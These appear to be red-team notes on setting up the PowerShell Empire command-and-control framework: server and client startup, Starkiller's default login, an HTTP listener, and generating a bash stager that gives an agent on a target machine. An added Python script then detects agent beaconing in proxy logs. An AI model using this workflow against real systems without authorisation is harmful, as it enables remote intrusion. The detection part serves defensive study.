# powershell empire

* Start the PowerShell Empire server (on a red team this is usually run on a cloud instance)
  * `sudo powershell-empire server`
* Start the PowerShell Empire client
  * `powershell-empire client`
  * to connect the client to a remote server, add to the end:
  * `HOSTNAME --username=USERNAME --password=PASSWORD`
* Starkiller can be used by running `starkiller` in the terminal
  * this brings up a GUI
  * the default credentials are `empireadmin` / `password123`
* Choose a listener
  * `uselistener http`
* At a minimum, set host and port in the options (option names are case sensitive)
  * `set host <local ip>`
  * `set port 8000`
* Stagers are payloads: when executed on a target, they connect back to a waiting listener and create an agent
  * `usestager multi/bash`
  * at a minimum, set the listener name to the one created earlier
  * `set Listener CLIHTTP`
  * run `execute` to generate the stager; this prints a script to run on the target
* Run the stager code on the target; this should check the agent in with the Empire server
* Running `agents` in the client lists every agent we can interact with
* Hop listeners can be used for pivoting with Empire

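The steps above end with an agent checking in to the listener at a fixed host and port, and that regular check-in is what a defender can look for on the wire. The following is an added example, not part of these notes or of the Empire project: it scans Apache-style combined access log lines (assumed proxy output) for source/destination pairs whose request spacing is suspiciously regular. The addresses, port and paths in the constructed sample are made up for the example and are not Empire defaults.

```python
"""Beacon-interval detector over web-proxy access logs (added example)."""
import re
import statistics
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Apache/nginx "combined"-style access log line (assumed proxy format).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample: 10.0.0.5 polls one host:port about once a minute,
# 10.0.0.7 browses a site at irregular intervals. Hosts and paths are
# invented for this example. Lines are deliberately not in time order.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2024:10:00:00 +0000] "GET http://203.0.113.10:8000/index.php HTTP/1.1" 200 512
10.0.0.7 - - [01/Mar/2024:10:00:12 +0000] "GET http://example.org/ HTTP/1.1" 200 8192
10.0.0.5 - - [01/Mar/2024:10:01:01 +0000] "GET http://203.0.113.10:8000/index.php HTTP/1.1" 200 512
10.0.0.7 - - [01/Mar/2024:10:01:40 +0000] "GET http://example.org/news HTTP/1.1" 200 4096
10.0.0.5 - - [01/Mar/2024:10:01:59 +0000] "GET http://203.0.113.10:8000/index.php HTTP/1.1" 200 512
10.0.0.5 - - [01/Mar/2024:10:03:00 +0000] "GET http://203.0.113.10:8000/index.php HTTP/1.1" 200 512
10.0.0.7 - - [01/Mar/2024:10:09:03 +0000] "GET http://example.org/about HTTP/1.1" 200 2048
10.0.0.5 - - [01/Mar/2024:10:04:02 +0000] "GET http://203.0.113.10:8000/index.php HTTP/1.1" 200 512
10.0.0.7 - - [01/Mar/2024:10:09:30 +0000] "GET http://example.org/contact HTTP/1.1" 200 1024
this line is malformed and must be skipped
"""


def parse_log(text):
    """Yield (src, dst_hostport, timestamp) for every well-formed line."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the scan
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        dst = urlsplit(m.group("url")).netloc or "-"
        yield m.group("src"), dst, ts


def find_beacons(text, min_hits=4, max_jitter=0.2):
    """Return (src, dst) pairs whose request intervals are near-constant.

    jitter is the coefficient of variation (pstdev / mean) of the gaps
    between consecutive requests; the closer to 0, the more clock-like.
    """
    hits = defaultdict(list)
    for src, dst, ts in parse_log(text):
        hits[(src, dst)].append(ts)

    findings = []
    for (src, dst), times in hits.items():
        if len(times) < min_hits:
            continue  # too few requests to judge regularity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        jitter = statistics.pstdev(gaps) / mean
        if jitter <= max_jitter:
            findings.append({
                "src": src,
                "dst": dst,
                "hits": len(times),
                "median_interval_s": statistics.median(gaps),
                "jitter": round(jitter, 3),
            })
    return sorted(findings, key=lambda f: f["jitter"])


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_LOG):
        print(f"{f['src']} -> {f['dst']}: {f['hits']} hits, "
              f"~{f['median_interval_s']:.0f}s apart, jitter {f['jitter']}")
```

On the sample this flags only `10.0.0.5 -> 203.0.113.10:8000` (five hits about 61 s apart). `max_jitter` is the tuning knob: agents are often configured with randomised sleep, so in practice the threshold is loosened and the result is combined with other signals such as how rare the destination is across the fleet.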